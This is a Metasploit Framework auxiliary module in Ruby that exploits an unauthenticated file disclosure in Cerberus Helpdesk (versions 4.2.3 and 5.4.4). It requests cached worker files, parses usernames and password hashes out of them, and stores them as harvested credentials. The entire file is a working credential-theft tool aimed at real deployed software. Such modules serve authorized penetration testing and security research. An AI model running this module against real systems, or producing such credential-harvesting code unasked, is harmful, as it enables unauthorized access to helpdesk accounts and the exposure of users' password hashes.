GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
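class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Names of the cache files requested under storage/tmp. They are tried in
  # order and the scan of a host stops after the first one that yields data.
  CACHE_SITES = %w[devblocks zend].freeze

  def initialize
    super(
      'Name' => 'Cerberus Helpdesk User Hash Disclosure',
      'Description' => %q{
        This module extracts usernames and password hashes from the Cerberus Helpdesk
        through an unauthenticated access to a workers file.
        Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
      },
      'References' => [
        [ 'EDB', '39526' ]
      ],
      'Author' => [
        'asdizzle_', # discovery
        'h00die', # module
      ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Mar 7 2016'
    )

    register_options(
      [
        OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])
      ]
    )
  end

  # Requests each candidate cache file from the target, parses worker records
  # out of the first usable response, reports them, and stops.
  #
  # @param rhost [String] host being scanned; requests go through the HttpClient
  #   mixin, so the value is not used directly here
  # @return [void]
  def run_host(rhost)
    CACHE_SITES.each do |site|
      url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")
      vprint_status("Attempting to load data from #{url}")
      res = send_request_cgi({ 'uri' => url })

      unless res
        print_error("#{peer} Unable to connect to #{url}")
        next
      end

      # Plausibility check before the fragile parse below; to_s guards against
      # a response object that carries no body at all.
      body = res.body.to_s
      unless body.include?('pass')
        print_error("Invalid response received for #{peer} for #{url}")
        next
      end

      report_credentials(extract_credentials(body))
      # Keep the original behaviour: one usable cache file per host is enough.
      break
    end
  rescue ::Rex::ConnectionError
    print_error("#{peer} Unable to connect to site")
  end

  # Pulls [username, password_hash] pairs out of the raw worker cache body.
  #
  # The format was never confirmed by the original author ("looks json-ish,
  # but it isn't"; the `s:5` markers suggest a serialized PHP structure, but
  # that is an assumption). The body is split on `s:5`, and from every chunk
  # that mentions `email` the 4th and 8th colon-separated fields are taken —
  # a rough equivalent of
  #   sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'
  #
  # @param body [String] raw HTTP response body
  # @return [Array<Array(String, String)>] [username, hash] pairs; chunks that
  #   do not carry both fields are skipped instead of raising
  def extract_credentials(body)
    body.split('s:5').each_with_object([]) do |record, creds|
      next unless record.include?('email')

      fields = record.split(':')
      raw_user = fields[3]
      raw_hash = fields[7]
      # A short or unexpected record would otherwise raise NoMethodError on
      # nil.tr and abort the whole host; skip it and keep the rest.
      next if raw_user.nil? || raw_hash.nil?

      username = raw_user.tr('";', '')[0...-1] # strip quoting, then the trailing 's'
      password_hash = raw_hash.tr('";', '') # strip quoting
      creds << [username, password_hash]
    end
  end

  # Prints each credential, stores it in the database, and renders the table.
  #
  # @param credentials [Array<Array(String, String)>] [username, hash] pairs
  # @return [void]
  def report_credentials(credentials)
    cred_table = Rex::Text::Table.new(
      'Header' => 'Cerberus Helpdesk User Credentials',
      'Indent' => 1,
      'Columns' => ['Username', 'Password Hash']
    )

    credentials.each do |username, password_hash|
      print_good("Found: #{username}:#{password_hash}")
      # :nonreplayable_hash marks the private as a hash that cannot simply be
      # replayed as a password, which is what the cache file exposes.
      store_valid_credential(
        user: username,
        private: password_hash,
        private_type: :nonreplayable_hash
      )
      cred_table << [username, password_hash]
    end

    vprint_status("#{peer} No credential records could be parsed from the response") if credentials.empty?
    print_line
    print_line cred_table.to_s
  end
end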